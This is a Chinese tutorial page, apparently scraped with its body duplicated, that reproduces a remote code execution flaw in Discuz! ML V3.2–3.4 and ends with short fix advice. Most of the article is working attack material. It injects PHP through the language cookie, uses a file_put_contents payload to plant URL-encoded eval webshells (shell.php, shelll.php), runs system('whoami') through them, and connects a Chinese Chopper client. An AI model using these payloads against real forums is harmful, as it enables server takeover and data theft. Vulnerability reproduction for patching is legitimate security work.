您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
Discuz! ML RCE漏洞getshell修复
雁卉2025-07-08Discuz教程已有人查阅
导读Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。0x01 影响版本
0x00 Discuz简介
Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。0x01 影响版本
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.40x02 环境搭建
phpstudy(php-7.2.10-nts Apache)
Discuz 3.4 源码(官网下载:http://discuz.ml/download 之后将源码解压到根目录 /WWW)0x03 漏洞复现
右上角语言标识,随便选择一种语言并抓包
将抓到的包发送到repeater模块
将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:
Getshell
exp:
解码后:
查看文件upload
url后加shell.php?cmd=system('whoami');
Exp:
将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,
如下图
访问执行shelll.php
执行后使用菜刀连接
http://127.0.0.1/discuz/upload/shelll.php
密码:a1(可自己修改)
0x04 修复建议
(1)修改source/function/function_core.php 644行为:
(3)或者安装较新补丁。
Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。0x01 影响版本
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.40x02 环境搭建
phpstudy(php-7.2.10-nts Apache)
Discuz 3.4 源码(官网下载:http://discuz.ml/download 之后将源码解压到根目录 /WWW)0x03 漏洞复现
右上角语言标识,随便选择一种语言并抓包
将抓到的包发送到repeater模块
将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:
Getshell
exp:
解码后:
'. file_put_contents('shell.php',urldecode('%3c%3fphp %20eval(%24_%47%45%54%5b%22cmd%22%5d)%3b%3f%3e')).'
解码前:
'. file_put_contents('shell.php',urldecode('')
将包中的xxxxx_language参数值改为解码后的exp,可以看到成功执行了代码,在文件夹中多出了shell.php文件,查看文件upload
url后加shell.php?cmd=system('whoami');
url:http://127.0.0.1/discuz/upload/shell.php?cmd=system('whoami');
直接执行了whoami命令Exp:
'. file_put_contents('shelll.php',urldecode('%3c%3fphp %20eval(%24_%50%4f%53%54%5b%22a1%22%5d)%3b%3f%3e')).'
原语句:<?php eval($_POST["a1"]);?>将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,
如下图
访问执行shelll.php
执行后使用菜刀连接
http://127.0.0.1/discuz/upload/shelll.php
密码:a1(可自己修改)
0x04 修复建议
(1)修改source/function/function_core.php 644行为:
/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';
(2)删除可控变量。(3)或者安装较新补丁。
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
上一篇:Discuz项目新建子网站的方法
相关教程
图文教程
解决Discuz百度小程序搜索排名不佳的问题
面对Discuz百度小程序搜索排名不佳的问题,我们需要从多个角度来进行深入分析和优化。搜索排名不佳可能涉及到小程序的SEO、用户体验、内容质量以及百度算法的变化等多个方面。
discuz nt 1.0分析
2.0一直也不推出,前几天看了几篇讨论dnt 1.0的文章,信心倍减。还是有一些地方看不太懂(没时间去懂?),今天看到一段AdminPage里的代码
IIS部署discuz论坛的步骤方法
首先,IIS要部署php项目,需要CgiModule模块的支持,所以首先我们要确认这个模块是否存在打开IIS管理器:
虚拟主机怎么搭建discuz论坛
3.在MySQL下创建个库,保存数据授予所有权限给用户:wangshaojun密码为:denny4.修改本地真机的DNS5.打开apache主配置文件,把虚拟主机的配置文件注释去掉
相关源码
-
自适应APP应用程序介绍推广落地页pbootcms网站源码下载移动应用开发商设计的营销型落地页模板,基于PbootCMS内核深度开发采用前沿响应式架构,无缝适配手机端操作习惯与PC端展示需求。查看源码 -
(自适应响应式)HTML5磁电机械设备蓝色营销型网站pbootcms模板本模板为磁电设备行业设计,采用蓝色营销风格,突出工业设备的专业性和技术感。模板结构清晰,能够有效展示磁电设备的技术参数、应用场景和企业实力,帮助客户快速了解产品特点和公司服务。查看源码 -
(自适应)简繁双语机械矿山矿石五金设备pbootcms源码下载本模板基于PbootCMS开发,主要面向机械五金、矿山矿石设备等行业,支持简体中文和繁体中文双语切换。采用响应式布局技术,确保在各种设备上都能获得良好的浏览体验。模板设计注重展示工业设备的专业性和技术特点,帮助企业建立可靠的线上展示平台。查看源码 -
帝国cms7.5女性护肤搭配美妆潮流网站源码带数据4.5G本模板专为女性美容护肤行业设计,提供美容护肤、发型设计、女性健康、时尚化妆、娱乐新闻、服饰搭配等女性潮流资讯内容展示。采用帝国CMS7.5开发,同步生成电脑端和手机端,满足用户对美容时尚信息的获取需求。查看源码 -
(PC+WAP)化工材料企业环保能源绿色营销型pbootcms模板源码下载本模板为化工材料及环保能源企业设计,采用PbootCMS开发,可展示各类化工产品、环保技术及能源解决方案。查看源码 -
自适应响应式绿色装修公司定制家居类pbootcms网站下载(自适应手机端)响应式全屋装修定制家居类网站pbootcms模板 绿色装修公司网站源码下载PbootCMS内核开发的网站模板,该模板适用于装修定制网站、装查看源码
| 分享笔记 (共有 篇笔记) |